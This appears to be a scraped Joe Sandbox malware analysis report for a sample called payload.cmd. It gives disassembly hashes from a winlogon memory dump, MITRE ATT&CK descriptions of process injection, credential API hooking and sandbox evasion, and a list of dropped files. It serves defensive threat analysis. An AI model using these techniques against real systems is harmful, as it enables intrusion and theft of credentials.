Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 168bd5042619de978051ce00469c6fab8e07dcb428ef58c1d872ee4ec8472086
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: A741F633A16B8886F711DF65E404BD9B7A0FB98798FC04121EE8D87758EB39C441CB82

Function 000001CA7D1E1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D1E126A
HeapAlloc.KERNEL32 ref: 000001CA7D1E1279
GetProcessHeap.KERNEL32 ref: 000001CA7D1E1293
HeapAlloc.KERNEL32 ref: 000001CA7D1E12A4

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 8e9949c7d491d186b10d6f9a7e37656757b2784cb481f8207ee02abd3ddac45a
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: C8E06572A427089AF715CF52D81878936E1FF88F0AF85C014C90907350DF7ED5998782

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report payload.cmd

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_dc34baa62d94b1453e37c8fdf4c57a0ef7376b6_e3b0f337_42f6c3a8-d842-4e1b-810a-fd49d4776785\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_dc34baa62d94b1453e37c8fdf4c57a0ef7376b6_e3b0f337_a2c71c6d-8906-440a-a6d6-1113292059f7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F3A.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER31CB.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER31FB.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6AE.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB52.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA2.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1riomnp1.nuz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fza54o2.50k.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_de3gveca.2sd.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnbrynbb.dzf.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rbbfu22a.mvk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vprrwa1p.ezw.psm1

C:\Users\user\AppData\Roaming\$nya-Logs\2024-10-03

Windows Analysis Report
payload.cmd

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre